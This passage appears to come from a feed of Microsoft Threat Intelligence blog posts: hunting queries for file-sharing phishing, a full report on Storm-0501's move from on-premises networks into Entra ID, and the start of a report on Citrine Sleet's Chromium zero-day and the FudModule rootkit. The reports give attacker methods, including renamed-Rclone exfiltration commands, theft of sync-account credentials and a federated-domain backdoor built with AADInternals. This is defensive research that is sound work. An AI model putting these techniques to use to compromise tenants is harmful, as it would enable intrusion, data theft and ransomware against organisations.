    | distinct tostring(ObjectName);
CloudAppEvents
| where ActionType == "AddedToSecureLink"
| where Application in ("Microsoft SharePoint Online", "Microsoft OneDrive for Business")
| extend FileShared = tostring(RawEventData.ObjectId)
| where FileShared in (filesCreated)
| extend UserSharedWith = tostring(RawEventData.TargetUserOrGroupName)
| extend TypeofUserSharedWith = RawEventData.TargetUserOrGroupType
| where TypeofUserSharedWith == "Guest"
| where isnotempty(FileShared) and isnotempty(UserSharedWith)
| join kind=inner securelinkCreated on $left.FileShared==$right.ObjectName
// Secure file created recently (in the last 1day)
| where (Timestamp - FileCreatedTime) between (1d .. 0h)
| summarize NumofUsersSharedWith = dcount(UserSharedWith) by FileShared
| where NumofUsersSharedWith >= 20

Dropbox: The following query highlights that a file hosted on Dropbox has been shared with multiple participants.

CloudAppEvents
| where ActionType in ("Added users and/or groups to shared file/folder", "Invited user to Dropbox and added them to shared file/folder")
| where Application == "Dropbox"
| where ObjectType == "File"
| extend FileShared = tostring(ObjectName)
| where isnotempty(FileShared)
| mv-expand ActivityObjects
| where ActivityObjects.Type == "Account" and ActivityObjects.Role == "To"
| extend SharedBy = AccountId
| extend UserSharedWith = tostring(ActivityObjects.Name)
| summarize dcount(UserSharedWith) by FileShared, AccountObjectId
| where dcount_UserSharedWith >= 20

Microsoft Sentinel

Microsoft Sentinel customers can use the resources below to find related activities similar to those described in this post:

The following query identifies files with specific keywords that attackers might use in this campaign that have been shared through OneDrive or SharePoint using a Secure Link and accessed by over 10 unique users. It captures crucial details like target users, client IP addresses, timestamps, and file URLs to aid in detecting potential attacks:

let OperationName = dynamic(['SecureLinkCreated', 'AddedToSecureLink']);
OfficeActivity
| where Operation in (OperationName)
| where OfficeWorkload in ('OneDrive', 'SharePoint')
| where SourceFileName has_any ("payment", "invoice", "urgent", "mandatory", "Payoff", "Wire", "Confirmation", "password", "paycheck", "bank statement", "bank details", "closing", "funds", "bank account", "account details", "remittance", "deposit", "Reset")
| summarize CountOfShares = dcount(TargetUserOrGroupName), 
            make_list(TargetUserOrGroupName), 
            make_list(ClientIP), 
            make_list(TimeGenerated), 
            make_list(SourceRelativeUrl) by SourceFileName, OfficeWorkload
| where CountOfShares > 10

Considering that the attacker compromises users through AiTM,  possible AiTM phishing attempts can be detected through the below rule:

• Possible AiTM Phishing Attempt

In addition, customers can also use the following identity-focused queries to detect and investigate anomalous sign-in events that may be indicative of a compromised user identity being accessed by a threat actor:

• Signins From VPS Providers
• Signins from Nord VPN Providers
• Successful Signin From Non-Compliant Device

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post File hosting services misused for identity phishing appeared first on Microsoft Security Blog.

Storm-0501 has been active as early as 2021, initially observed deploying the Sabbath(54bb47h) ransomware in attacks targeting US school districts, publicly leaking data for extortion, and even directly messaging school staff and parents. Since then, most of the threat actor’s attacks have been opportunistic, as the group began operating as a ransomware-as-a-service (RaaS) affiliate deploying multiple ransomware payloads developed and maintained by other threat actors over the years, including Hive, BlackCat (ALPHV), Hunters International, LockBit, and most recently, Embargo ransomware. The threat actor was also recently observed targeting hospitals in the US.

Storm-0501 is the latest threat actor observed to exploit weak credentials and over-privileged accounts to move from organizations’ on-premises environment to cloud environments. They stole credentials and used them to gain control of the network, eventually creating persistent backdoor access to the cloud environment and deploying ransomware to the on-premises. Microsoft previously observed threat actors such as Octo Tempest and Manatee Tempest targeting both on-premises and cloud environments and exploiting the interfaces between the environments to achieve their goals.

As hybrid cloud environments become more prevalent, the challenge of securing resources across multiple platforms grows ever more critical for organizations. Microsoft is committed to helping customers understand these attacks and build effective defenses against them.

In this blog post, we will go over Storm-0501’s tactics, techniques, and procedures (TTPs), typical attack methods, and expansion to the cloud. We will also provide information on how Microsoft detects activities related to this kind of attack, as well as provide mitigation guidance to help defenders protect their environment.

Analysis of the recent Storm-0501 campaign

On-premises compromise

Initial access and reconnaissance

Storm-0501 previously achieved initial access through intrusions facilitated by access brokers like Storm-0249 and Storm-0900, leveraging possibly stolen compromised credentials to sign in to the target system, or exploiting various known remote code execution vulnerabilities in unpatched public-facing servers. In a recent campaign, Storm-0501 exploited known vulnerabilities in Zoho ManageEngine (CVE-2022-47966), Citrix NetScaler (CVE-2023-4966), and ColdFusion 2016 application (possibly CVE-2023-29300 or CVE-2023-38203). In cases observed by Microsoft, these initial access techniques, combined with insufficient operational security practices by the targets, provided the threat actor with administrative privileges on the target device.

After gaining initial access and code execution capabilities on the affected device in the network, the threat actor performed extensive discovery to find potential desirable targets such as high-value assets and general domain information like Domain Administrator users and domain forest trust. Common native Windows tools and commands, such as systeminfo.exe, net.exe, nltest.exe, tasklist.exe, were leveraged in this phase. The threat actor also utilized open-source tools like ossec-win32 and OSQuery to query additional endpoint information. Additionally, in some of the attacks, we observed the threat actor running an obfuscated version of ADRecon.ps1 called obfs.ps1 or recon.ps1 for Active Directory reconnaissance.

Following initial access and reconnaissance, the threat actor deployed several remote monitoring and management tools (RMMs), such as Level.io, AnyDesk, and NinjaOne to interact with the compromised device and maintain persistence.

Credential access and lateral movement

The threat actor took advantage of admin privileges on the local devices it compromised during initial access and attempted to gain access to more accounts within the network through several methods. The threat actor primarily utilized Impacket’s SecretsDump module, which extracts credentials over the network, and leveraged it across an extensive number of devices to obtain credentials. The threat actor used the compromised credentials to access more devices in the network and then leveraged Impacket again to collect additional credentials. The threat actor then repeated this process until they compromised a large set of credentials that potentially included multiple Domain Admin credentials.

In addition, the threat actor was observed attempting to gather secrets by reading sensitive files and in some cases gathering KeePass secrets from the compromised devices. The threat actor used EncryptedStore’s Find-KeePassConfig.ps1 PowerShell script to output the database location and keyfile/user master key information and launch the KeePass executable to gather the credentials. We assess with medium confidence that the threat actor also performed extensive brute force activity on a few occasions to gain additional credentials for specific accounts.

The threat actor was observed leveraging Cobalt Strike to move laterally across the network using the compromised credentials and using the tool’s command-and-control (C2) capabilities to directly communicate with the endpoints and send further commands. The common Cobalt Strike Beacon file types used in these campaigns were .dll files and .ocx files that were launched by rundll32.exe and regsvr32.exe respectively. Moreover, the “license_id” associated with this Cobalt Strike Beacon is “666”.  The “license_id” definition is commonly referred to as Watermark and is a nine-digit value that is unique per legitimate license provided by Cobalt Strike. In this case, the “license_id” was modified with 3-digit unique value in all the beacon configurations.

In cases we observed, the threat actor’s lateral movement across the campaign ended with a Domain Admin compromise and access to a Domain Controller that eventually enabled them to deploy ransomware across the devices in the network.

Data collection and exfiltration

The threat actor was observed exfiltrating sensitive data from compromised devices. To exfiltrate data, the threat actor used the open-source tool Rclone and renamed it to known Windows binary names or variations of them, such as svhost.exe or scvhost.exe as masquerading means. The threat actor employed the renamed Rclone binaries to transfer data to the cloud, using a dedicated configuration that synchronized files to public cloud storage services such as MegaSync across multiple threads. The following are command line examples used by the threat actor in demonstrating this behavior:

• Svhost.exe copy –filter-from [REDACTED] [REDACTED] config:[REDACTED] -q –ignore-existing –auto-confirm –multi-thread-streams 11 –transfers 11
• scvhost.exe –config C:\Windows\Debug\a.conf copy [REDACTED UNC PATH] [REDACTED]

Defense evasion

The threat actor attempted to evade detection by tampering with security products in some of the devices they got hands-on-keyboard access to. They employed an open-source tool, resorted to PowerShell cmdlets and existing binaries to evade detection, and in some cases, distributed Group Policy Object (GPO) policies to tamper with security products.

On-premises to cloud pivot

In their recent campaign, we noticed a shift in Storm-0501’s methods. The threat actor used the credentials, specifically Microsoft Entra ID (formerly Azure AD), that were stolen from earlier in the attack to move laterally from the on-premises to the cloud environment and establish persistent access to the target network through a backdoor.

Storm-0501 was observed using the following attack vectors and pivot points on the on-premises side to gain subsequent control in Microsoft Entra ID:

Microsoft Entra Connect Sync account compromise

Microsoft Entra Connect, previously known as Azure AD Connect, is an on-premises Microsoft application that plays a critical role in synchronizing passwords and sensitive data between Active Directory (AD) objects and Microsoft Entra ID objects. Microsoft Entra Connect synchronizes the on-premises identity and Microsoft Entra identity of a user account to allow the user to sign in to both realms with the same password. To deploy Microsoft Entra Connect, the application must be installed on an on-premises server or an Azure VM. To decrease the attack surface, Microsoft recommends that organizations deploy Microsoft Entra Connect on a domain-joined server and restrict administrative access to domain administrators or other tightly controlled security groups. Microsoft Incident Response also published recommendations on preventing cloud identity compromise.

Microsoft Entra Connect Sync is a component of Microsoft Entra Connect that synchronizes identity data between on-premises environments and Microsoft Entra ID. During the Microsoft Entra Connect installation process, at least two new accounts (more accounts are created if there are multiple forests) responsible for the synchronization are created, one in the on-premises AD realm and the other in the Microsoft Entra ID tenant. These service accounts are responsible for the synchronization process.

The on-premises account name is prefixed with “MSOL_” and has permissions to replicate directory changes, modify passwords, modify users, modify groups, and more (see full permissions here).

The cloud Microsoft Entra ID account is prefixed with “sync_<Entra Connect server name>_” and has the account display name set to “On-Premises Directory Synchronization Service Account”. This user account is assigned with the Directory Synchronization Accounts role (see detailed permissions of this role here). Microsoft recently implemented a change in Microsoft Entra ID that restricts permissions on the Directory Synchronization Accounts (DSA) role in Microsoft Entra Connect Sync and Microsoft Entra Cloud Sync and helps prevent abuse.

The on-premises and cloud service accounts conduct the syncing operation every few minutes, similar to Password Hash Synchronization (PHS), to uphold real time user experience. Both user accounts mentioned above are crucial for the Microsoft Entra Connect Sync service operations and their credentials are saved encrypted via DPAPI (Data Protection API) on the server’s disk or a remote SQL server.

We can assess with high confidence that in the recent Storm-0501 campaign, the threat actor specifically located Microsoft Entra Connect Sync servers and managed to extract the plain text credentials of the Microsoft Entra Connect cloud and on-premises sync accounts. We assess that the threat actor was able to achieve this because of the previous malicious activities described in this blog post, such as using Impacket to steal credentials and DPAPI encryption keys, and tampering with security products.

Following the compromise of the cloud Directory Synchronization Account, the threat actor can authenticate using the clear text credentials and get an access token to Microsoft Graph. The compromise of the Microsoft Entra Connect Sync account presents a high risk to the target, as it can allow the threat actor to set or change Microsoft Entra ID passwords of any hybrid account (on-premises account that is synced to Microsoft Entra ID).

Cloud session hijacking of on-premises user account

Another way to pivot from on-premises to Microsoft Entra ID is to gain control of an on-premises user account that has a respective user account in the cloud. In some of the Storm-0501 cases we investigated, at least one of the Domain Admin accounts that was compromised had a respective account in Microsoft Entra ID, with multifactor authentication (MFA) disabled, and assigned with a Global Administrator role. It is important to mention that the sync service is unavailable for administrative accounts in Microsoft Entra, hence the passwords and other data are not synced from the on-premises account to the Microsoft Entra account in this case. However, if the passwords for both accounts are the same, or obtainable by on-premises credential theft techniques (i.e. web browsers passwords store), then the pivot is possible.

If a compromised on-premises user account is not assigned with an administrative role in Microsoft Entra ID and is synced to the cloud and no security boundaries such as MFA or Conditional Access are set, then the threat actor could escalate to the cloud through the following:

1. If the password is known, then logging in to Microsoft Entra is possible from any device.
2. If the password is unknown, the threat actor can reset the on-premises user password, and after a few minutes the new password will be synced to the cloud.
3. If they hold credentials of a compromised Microsoft Entra Directory Synchronization Account, they can set the cloud password using AADInternals’ Set-AADIntUserPassword cmdlet.

If MFA for that user account is enabled, then authentication with the user will require the threat actor to tamper with the MFA or gain control of a device owned by the user and subsequently hijack its cloud session or extract its Microsoft Entra access tokens along with their MFA claims.

MFA is a security practice that requires users to provide two or more verification factors to gain access to a resource and is a recommended security practice for all users, especially for privileged administrators. A lack of MFA or Conditional Access policies limiting the sign-in options opens a wide door of possibilities for the attacker to pivot to the cloud environment, especially if the user has administrative privileges. To increase the security of admin accounts, Microsoft is rolling out additional tenant-level security measures to require MFA for all Azure users.

Impact

Cloud compromise leading to backdoor

Following a successful pivot from the on-premises environment to the cloud through the compromised Microsoft Entra Connect Sync user account or the cloud admin account compromised through cloud session hijacking, the threat actor was able to connect to Microsoft Entra (portal/MS Graph) from any device, using a privileged Microsoft Entra ID account, such as a Global Administrator, and was no longer limited to the compromised devices.

Once Global Administrator access is available for Storm-0501, we observed them creating a persistent backdoor access for later use by creating a new federated domain in the tenant. This backdoor enables an attacker to sign in as any user of the Microsoft Entra ID tenant in hand if the Microsoft Entra ID user property ImmutableId is known or set by the attackers. For users that are configured to be synced by the Microsoft Entra Connect service, the ImmutableId property is automatically populated, while for users that are not synced the default value is null. However, users with administrative privileges can add an ImmutableId value, regardless.

The threat actor used the open-source tool AADInternals, and its Microsoft Entra ID capabilities to create the backdoor. AADInternals is a PowerShell module designed for security researchers and penetration testers that provides various methods for interacting and testing Microsoft Entra ID and is commonly used by Storm-0501. To create the backdoor, the threat actor first needed to have a domain of their own that is registered to Microsoft Entra ID. The attacker’s next step is to determine whether the target domain is managed or federated. A federated domain in Microsoft Entra ID is a domain that is configured to use federation technologies, such as Active Directory Federation Services (AD FS), to authenticate users. If the target domain is managed, then the attackers need to convert it to a federated one and provide a root certificate to sign future tokens upon user authentication and authorization processes. If the target domain is already federated, then the attackers need to add the root certificate as “NextSigningCertificate”.

Once a backdoor domain is available for use, the threat actor creates a federation trust between the compromised tenant, and their own tenant. The threat actor uses the AADInternals commands that enable the creation of Security Assertion Markup Language (SAML or SAML2) tokens, which can be used to impersonate any user in the organization and bypass MFA to sign in to any application. Microsoft observed the actor using the SAML token sign in to Office 365.

On-premises compromise leading to ransomware

Once the threat actor achieved sufficient control over the network, successfully extracted sensitive files, and managed to move laterally to the cloud environment, the threat actor then deployed the Embargo ransomware across the organization. We observed that the threat actor did not always resort to ransomware distribution, and in some cases only maintained backdoor access to the network.

Embargo ransomware is a new strain developed in Rust, known to use advanced encryption methods. Operating under the RaaS model, the ransomware group behind Embargo allows affiliates like Storm-0501 to use its platform to launch attacks in exchange for a share of the ransom. Embargo affiliates employ double extortion tactics, where they first encrypt a victim’s files and threaten to leak stolen sensitive data unless a ransom is paid.

In the cases observed by Microsoft, the threat actor leveraged compromised Domain Admin accounts to distribute the Embargo ransomware via a scheduled task named “SysUpdate” that was registered via GPO on the devices in the network. The ransomware binaries names that were used were PostalScanImporter.exe and win.exe. Once the files on the target devices were encrypted, the encrypted files extension changed to .partial, .564ba1, and .embargo.

Mitigation and protection guidance

Microsoft recently implemented a change in Microsoft Entra ID that restricts permissions on the Directory Synchronization Accounts (DSA) role in Microsoft Entra Connect Sync and Microsoft Entra Cloud Sync as part of ongoing security hardening. This change helps prevent threat actors from abusing Directory Synchronization Accounts in attacks.

Customers may also refer to Microsoft’s human-operated ransomware overview for general hardening recommendations against ransomware attacks.

The other techniques used by threat actors and described in this blog can be mitigated by adopting the following security measures:

• Secure accounts with credential hygiene: practice the principle of least privilege and audit privileged account activity in your Microsoft Entra ID environments to slow and stop attackers.
• Enable Conditional Access policies – Conditional Access policies are evaluated and enforced every time the user attempts to sign in. Organizations can protect themselves from attacks that leverage stolen credentials by enabling policies such as device compliance or trusted IP address requirements.
  • Set a Conditional Access policy to limit the access of Microsoft Entra ID sync accounts from untrusted IP addresses to all cloud apps. The Microsoft Entra ID sync account is identified by having the role ‘Directory Synchronization Accounts’. Please refer to the Advanced Hunting section and check the relevant query to get those IP addresses.
• Implement Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
• Follow Microsoft’s best practices for securing Active Directory Federation Services.  
• Refer to Azure Identity Management and access control security best practices for further steps and recommendations to manage, design, and secure your Azure AD environment can be found by referring.
• Ensure Microsoft Defender for Cloud Apps connectors are turned on for your organization to receive alerts on the Microsoft Entra ID sync account and all other users.
• Enable protection to prevent by-passing of cloud Microsoft Entra MFA when federated with Microsoft Entra ID.
• Set the validatingDomains property of federatedTokenValidationPolicy to “all” to block attempts to sign-in to any non-federated domain (like .onmicrosoft.com) with SAML tokens.
• Turn on Microsoft Entra ID protection to monitor identity-based risks and create risk-based conditional access policies to remediate risky sign-ins.
• Turn on tamper protection features to prevent attackers from stopping security services such as Microsoft Defender for Endpoint, which can help prevent hybrid cloud environment attacks such as Microsoft Entra Connect abuse.
• Refer to the recommendations in our attacker technique profile, including use of Windows Defender Application Control or AppLocker to create policies to block unapproved information technology (IT) management tools to protect against the abuse of legitimate remote management tools like AnyDesk or Level.io.
• Run endpoint detection and response (EDR) in block mode so that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.
• Turn on investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to help remediate alerts, significantly reducing alert volume.

Detection details

Alerts with the following names can be in use when investigating the current campaign of Storm-0501.

Microsoft Defender XDR detections

Microsoft Defender Antivirus 

Microsoft Defender Antivirus detects the Cobalt Strike Beacon as the following:

• Behavior:Win32/CobaltStrike
• Backdoor:Win64/CobaltStrike
• HackTool:Win64/CobaltStrike

Additional Cobalt Strike components are detected as the following:

• TrojanDropper:PowerShell/Cobacis
• Trojan:Win64/TurtleLoader.CS
• Exploit:Win32/ShellCode.BN

Microsoft Defender Antivirus detects tools that enable Microsoft Entra ID enumeration as the following malware: 

• Backdoor:Win32/SuspAadInternalsUsage

Embargo Ransomware threat components are detected as the following:

• Ransom:Win32/Embargo

Microsoft Defender for Endpoint 

Alerts with the following titles in the security center can indicate threat activity related to Storm-0501 on your network:

• Ransomware-linked Storm-0501 threat actor detected

The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report. 

• Possible Adobe ColdFusion vulnerability exploitation
• Compromised account conducting hands-on-keyboard attack
• Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)
• Ongoing hands-on-keyboard attack via Impacket toolkit
• Suspicious Microsoft Defender Antivirus exclusion
• Attempt to turn off Microsoft Defender Antivirus protection
• Renaming of legitimate tools for possible data exfiltration
• BlackCat ransomware
• ‘Embargo’ ransomware was detected and was active
• Suspicious Group Policy action detected
• An active ‘Embargo’ ransomware was detected

The following alerts might indicate on-premises to cloud pivot through Microsoft Entra Connect:

• Entra Connect Sync credentials extraction attempt
• Suspicious cmdlets launch using AADInternals
• Potential Entra Connect Tampering
• Indication of local security authority secrets theft

Microsoft Defender for Identity

The following Microsoft Defender for Identity alerts can indicate activity related to this threat:

• Data exfiltration over SMB
• Suspected DCSync attack

Microsoft Defender for Cloud Apps

Microsoft Defender for Cloud Apps can detect abuse of permissions in Microsoft Entra ID and other cloud apps. Activities related to the Storm-0501 campaign described in this blog are detected as the following:

• Backdoor creation using AADInternals tool
• Compromised Microsoft Entra ID Cloud Sync account
• Suspicious sign-in to Microsoft Entra Connect Sync account
• Entra Connect Sync account suspicious activity following a suspicious login
• AADInternals tool used by a Microsoft Entra Sync account
• Suspicious login from AADInternals tool

Microsoft Defender Vulnerability Management

Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:

• CVE-2022-47966

Threat intelligence reports 

Microsoft customers can use the following reports in Microsoft Defender Threat Intelligence to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments: 

• Storm-0501

Advanced hunting 

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

Microsoft Entra Connect Sync account exploration

Explore sign-in activity from IdentityLogonEvents, look for uncommon behavior, such as sign-ins from newly seen IP addresses or sign-ins to new applications that are non-sync related.

IdentityLogonEvents
| where Timestamp > ago(30d)
| where AccountDisplayName contains "On-Premises Directory Synchronization Service Account"
| extend ApplicationName = tostring(RawEventData.ApplicationName)
| project-reorder Timestamp, AccountDisplayName, AccountObjectId, IPAddress, ActionType, ApplicationName, OSPlatform, DeviceType

Usually, the activity of the sync account is repetitive, coming from the same IP address to the same application, any deviation from the natural flow is worth investigating. Cloud applications that normally accessed by the Microsoft Entra ID sync account are “Microsoft Azure Active Directory Connect”, “Windows Azure Active Directory”, “Microsoft Online Syndication Partner Portal”

Explore the cloud activity (a.k.a ActionType) of the sync account, same as above, this account by nature performs a certain set of actions including ‘update User.’, ‘update Device.’ and so on. New and uncommon activity from this user might indicate an interactive use of the account, even though it could have been from someone inside the organization it could also be the threat actor.

CloudAppEvents
| where Timestamp > ago(30d)
| where AccountDisplayName has "On-Premises Directory Synchronization Service Account"
| extend Workload = RawEventData.Workload
| project-reorder Timestamp, IPAddress, AccountObjectId, ActionType, Application, Workload, DeviceType, OSPlatform, UserAgent, ISP

Pay close attention to action from different DeviceTypes or OSPlatforms, this account automated service is performed from one specific machine, so there shouldn’t be any variety in these fields.

Check which IP addresses Microsoft Entra Connect Sync account uses

This query reveals all IP addresses that the default Microsoft Entra Connect Sync account uses so those could be added as trusted IP addresses for the Entra ID sync account (make sure the account is not compromised before relying on this list)

IdentityLogonEvents
| where AccountDisplayName has "On-Premises Directory Synchronization Service Account"
| where ActionType == "LogonSuccess"
| distinct IPAddress
| union (CloudAppEvents
| where AccountDisplayName has "On-Premises Directory Synchronization Service Account"
| distinct IPAddress)
| distinct IPAddress

Federation and authentication domain changes

Explore the addition of a new authentication or federation domain, validate that the new domain is valid one and was purposefully added

CloudAppEvents
| where Timestamp > ago(30d)
| where ActionType in ("Set domain authentication.", "Set federation settings on domain.")

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Assess your environment for Manage Engine, Netscaler, and ColdFusion vulnerabilities.

DeviceTvmSoftwareVulnerabilities  
| where CveId in ("CVE-2022-47966","CVE-2023-4966","CVE-2023-29300","CVE-2023-38203")   
| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,  
CveId,VulnerabilitySeverityLevel  
| join kind=inner ( DeviceTvmSoftwareVulnerabilitiesKB | project CveId, CvssScore,IsExploitAvailable,VulnerabilitySeverityLevel,PublishedDate,VulnerabilityDescription,AffectedSoftware ) on CveId  
| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,  
CveId,VulnerabilitySeverityLevel,CvssScore,IsExploitAvailable,PublishedDate,VulnerabilityDescription,AffectedSoftware

Search for file IOC

let selectedTimestamp = datetime(2024-09-17T00:00:00.0000000Z);
let fileName = dynamic(["PostalScanImporter.exe","win.exe","name.dll","248.dll","cs240.dll","fel.ocx","theme.ocx","hana.ocx","obfs.ps1","recon.ps1"]); 
let FileSHA256 = dynamic(["efb2f6452d7b0a63f6f2f4d8db49433259249df598391dd79f64df1ee3880a8d","a9aeb861817f3e4e74134622cbe298909e28d0fcc1e72f179a32adc637293a40","caa21a8f13a0b77ff5808ad7725ff3af9b74ce5b67426c84538b8fa43820a031","53e2dec3e16a0ff000a8c8c279eeeca8b4437edb8ec8462bfbd9f64ded8072d9","827f7178802b2e92988d7cff349648f334bc86317b0b628f4bb9264285fccf5f","ee80f3e3ad43a283cbc83992e235e4c1b03ff3437c880be02ab1d15d92a8348a","de09ec092b11a1396613846f6b082e1e1ee16ea270c895ec6e4f553a13716304","d065623a7d943c6e5a20ca9667aa3c41e639e153600e26ca0af5d7c643384670","c08dd490860b54ae20fa9090274da9ffa1ba163f00d1e462e913cf8c68c11ac1"]); 
search in (AlertEvidence,BehaviorEntities,CommonSecurityLog,DeviceBaselineComplianceProfiles,DeviceEvents,DeviceFileEvents,DeviceImageLoadEvents, DeviceLogonEvents,DeviceNetworkEvents,DeviceProcessEvents,DeviceRegistryEvents,DeviceFileCertificateInfo,DynamicEventCollection,EmailAttachmentInfo,OfficeActivity,SecurityEvent,ThreatIntelligenceIndicator) TimeGenerated between ((selectedTimestamp - 1m) .. (selectedTimestamp + 90d)) // from September 17th runs the search for 90 days, change the selectedTimestamp accordingly. and  (FileName in (fileName) or OldFileName in (fileName)  or ProfileName in (fileName)  or InitiatingProcessFileName in (fileName)  or InitiatingProcessParentFileName in (fileName)  or InitiatingProcessVersionInfoInternalFileName in (fileName)  or InitiatingProcessVersionInfoOriginalFileName in (fileName)  or PreviousFileName in (fileName)  or ProcessVersionInfoInternalFileName in (fileName) or ProcessVersionInfoOriginalFileName in (fileName) or DestinationFileName in (fileName) or SourceFileName in (fileName)or ServiceFileName in (fileName) or SHA256 in (FileSHA256)  or InitiatingProcessSHA256 in (FileSHA256))

Microsoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post exploitation activity detailed in this blog, in addition to Microsoft Defender XDR detections list above.

• Remote Management Monitoring Network Connections
• Level.io RMM File Signature
• AnyDesk RMM File Signature
• NinjaOne RMM File Signature
• Potential Impacket Execution
• Potential ransomware activity related to Cobalt Strike
• Cobalt DNS Beacon
• C2-NamedPipe
• Renamed Rclone Exfiltration
• Disable Or Modify Windows Defender
• Clearing of forensic evidence from event logs using wevtutil
• Suspicious Signin By AAD Connect Account

Indicators of compromise (IOCs)

The following list provides indicators of compromise (IOCs) observed during our investigation. We encourage our customers to investigate these indicators within their environments and implement detections and protections to identify any past related activity and prevent future attacks against their systems.

References

• The Rust Revolution: New Embargo Ransomware Steps In – Cyble
• Embargo Ransomware Group: The Interview (suspectfile.com)
• https://aadinternals.com/post/aadbackdoor/
• https://aadinternals.com/post/aad-deepdive/

Omri Refaeli, Tafat Gaspar, Vaibhav Deshmukh, Naya Hashem, Charles-Edouard Bettan

Microsoft Threat Intelligence Community

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Storm-0501: Ransomware attacks expanding to hybrid cloud environments appeared first on Microsoft Security Blog.

CVE-2024-7971 is a type confusion vulnerability in the V8 JavaScript and WebAssembly engine, impacting versions of Chromium prior to 128.0.6613.84. Exploiting the vulnerability could allow threat actors to gain RCE in the sandboxed Chromium renderer process. Google released a fix for the vulnerability on August 21, 2024, and users should ensure they are using the latest version of Chromium. We would like to thank the Chromium team for their collaboration in addressing this issue. CVE-2024-7971 is the third exploited V8 type confusion vulnerability that has been patched in V8 this year, after CVE-2024-4947 and CVE-2024-5274. As with any observed nation-state actor activity, Microsoft has directly notified targeted or compromised customers, providing them with important information to help secure their environments.

In this blog, we share details on the North Korean threat actor Citrine Sleet and the observed tactics, techniques, and procedures (TTPs) used to exploit CVE-2024-7971, deploy the FudModule rootkit, and compromise systems. We further provide recommended mitigations, detection details, hunting guidance, and indicators of compromise (IOCs) to help defenders identify, respond to, and improve defenses against these attacks.

Who is Citrine Sleet?

The threat actor that Microsoft tracks as Citrine Sleet is based in North Korea and primarily targets financial institutions, particularly organizations and individuals managing cryptocurrency, for financial gain. As part of its social engineering tactics, Citrine Sleet has conducted extensive reconnaissance of the cryptocurrency industry and individuals associated with it. The threat actor creates fake websites masquerading as legitimate cryptocurrency trading platforms and uses them to distribute fake job applications or lure targets into downloading a weaponized cryptocurrency wallet or trading application based on legitimate applications. Citrine Sleet most commonly infects targets with the unique trojan malware it developed, AppleJeus, which collects information necessary to seize control of the targets’ cryptocurrency assets. The FudModule rootkit described in this blog has now been tied to Citrine Sleet as shared tooling with Diamond Sleet.

The United States government has assessed that North Korean actors, like Citrine Sleet, will likely continue targeting vulnerabilities of cryptocurrency technology firms, gaming companies, and exchanges to generate and launder funds to support the North Korean regime. One of the organizations targeted by the CVE-2024-7971 exploitation was also previously targeted by Sapphire Sleet.

Citrine Sleet is tracked by other security companies as AppleJeus, Labyrinth Chollima, UNC4736, and Hidden Cobra, and has been attributed to Bureau 121 of North Korea’s Reconnaissance General Bureau.

Exploiting CVE-2024-7971

The observed zero-day exploit attack by Citrine Sleet used the typical stages seen in browser exploit chains. First, the targets were directed to the Citrine Sleet-controlled exploit domain voyagorclub[.]space. While we cannot confirm at this time how the targets were directed, social engineering is a common tactic used by Citrine Sleet. Once a target connected to the domain, the zero-day RCE exploit for CVE-2024-7971 was served.

After the RCE exploit achieved code execution in the sandboxed Chromium renderer process, shellcode containing a Windows sandbox escape exploit and the FudModule rootkit was downloaded, and then loaded into memory. The sandbox escape exploited CVE-2024-38106, a vulnerability in the Windows kernel that Microsoft fixed on August 13, 2024, before Microsoft discovered this North Korean threat actor activity. CVE-2024-38106 was reported to Microsoft Security Response Center (MSRC) as being exploited; however, our investigations so far have not suggested any link between the reported CVE-2024-38106 exploit activity and this Citrine Sleet exploit activity, beyond exploiting the same vulnerability. This may suggest a “bug collision,” where the same vulnerability is independently discovered by separate threat actors, or knowledge of the vulnerability was shared by one vulnerability researcher to multiple actors.

Once the sandbox escape exploit was successful, the main FudModule rootkit ran in memory. This rootkit employs direct kernel object manipulation (DKOM) techniques to disrupt kernel security mechanisms, executes exclusively from user mode, and performs kernel tampering through a kernel read/write primitive. We did not observe any additional malware activity on the target devices.

FudModule rootkit

FudModule is a sophisticated rootkit malware that specifically targets kernel access while evading detection. Threat actors have been observed using the FudModule data-only rootkit to establish admin-to-kernel access to Windows-based systems to allow read/write primitive functions and perform DKOM.

